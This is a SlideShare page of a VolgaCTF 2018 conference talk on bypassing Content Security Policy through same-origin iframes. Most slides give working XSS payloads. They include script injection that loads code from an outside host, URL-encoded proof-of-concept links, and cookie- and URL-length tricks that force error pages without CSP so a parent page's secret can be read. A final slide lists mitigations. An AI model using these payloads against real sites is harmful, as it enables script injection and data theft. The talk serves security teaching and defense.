Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Upcoming SlideShare
What to Upload to SlideShare
Next
Download to read offline and view in fullscreen.

0

Share

Download to read offline

VolgaCTF 2018 - Neatly bypassing CSP

Download to read offline

How to trick CSP in letting you run whatever you want

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all
  • Be the first to like this

VolgaCTF 2018 - Neatly bypassing CSP

  1. 1. CSP bypass challenge default-src 'self' 'unsafe-inline'; sandbox allow-forms allow-same-origin allow-scripts allow-modals hsts.pro/csp.php
  2. 2. https://deepsec.net/docs/Slides/2016/CSP_Is_Dead,_Long_Live_Strict_CSP!_Lukas_Weichselbaum.pdf
  3. 3. Content-Security-Policy: default-src 'self' 'unsafe-inline';
  4. 4. Content-Security-Policy: default-src 'self' 'unsafe-inline';
  5. 5. Content-Security-Policy: default-src 'self' 'unsafe-inline';
  6. 6. CSP BYPASS
  7. 7. Neatly bypassing CSP
  8. 8. CSP BYPASS
  9. 9. ? Content-Security-Policy: default-src 'self' 'unsafe-inline';
  10. 10. frame=document.createElement("iframe") frame.src="/css/bootstrap.min.css" document.body.appendChild(frame)
  11. 11. script=document.createElement('script') script.src='//bo0om.ru/csp.js’ let myframe = window.frames[0].document myframe.head.appendChild(script) +
  12. 12. PoC #1 http://hsts.pro/csp.php?xss=f=document.createElement(%22iframe%2 2);f.id=%22pwn%22;f.src=%22/robots.txt%22;f.onload=()=%3E%7Bx=do cument.createElement(%27script%27);x.src=%27//bo0om.ru/csp.js%27 ;pwn.contentWindow.document.body.appendChild(x)%7D;document.b ody.appendChild(f); OR bit.ly/2MEip1P
  13. 13. X-Frame-Options: deny?
  14. 14. Nginx + /../ = 400
  15. 15. Apache + /%%z = 400
  16. 16. Nope?
  17. 17. What is the maximum length of a URL?
  18. 18. Nginx
  19. 19. Apache
  20. 20. frame=document.createElement("iframe") frame.src="/"+"A".repeat(20000) document.body.appendChild(frame)
  21. 21. Cookie
  22. 22. • Create a humongous cookie for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)}; • Open an iframe using any address, which will cause the server to return an error (often without XFO or CSP) • Remove the humongous cookie: for(var i=0;i<5;i++){document.cookie=i+"="} • Write your own js script into the frame that steals the parent’s secret
  23. 23. PoC #2 http://hsts.pro/csp.php?xss=for%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocu ment.cookie=i%2b%22=%22%2b%22a%22.repeat%284000%29%7D;f=docum ent.createElement%28%22iframe%22%29;f.id=%22pwn%22;f.src=%22/%22;f. onload=%28%29=%3E%7Bfor%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocum ent.cookie=i%2b%22=%22%7D;x=document.createElement%28%27script%2 7%29;x.src=%27data:,alert%28%22Pwned%20%22%2btop.secret.textConten t%29%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;d ocument.body.appendChild%28f%29; OR bit.ly/2D1QOry
  24. 24. FixMe • CSP headers should be present on all the pages, event on the error pages returned by the web-server. • CSP options should be configured to restrict the rights to just those necessary to work with the specific resource. Try setting Content- Security-Policy-Report-Only: default-src ‘none’ and gradually adding permission rules for specific use cases. • If you have to use unsafe-inline for correctly loading and processing the resources, your only protection is to use nonce or hash-source. Otherwise, you are exposed to XSS exploits and if CSP doesn’t protect, why do you need it in the first place?!))
  25. 25. Q?

How to trick CSP in letting you run whatever you want

Views

Total views

2,826

On Slideshare

0

From embeds

0

Number of embeds

146

Actions

Downloads

21

Shares

0

Comments

0

Likes

0

×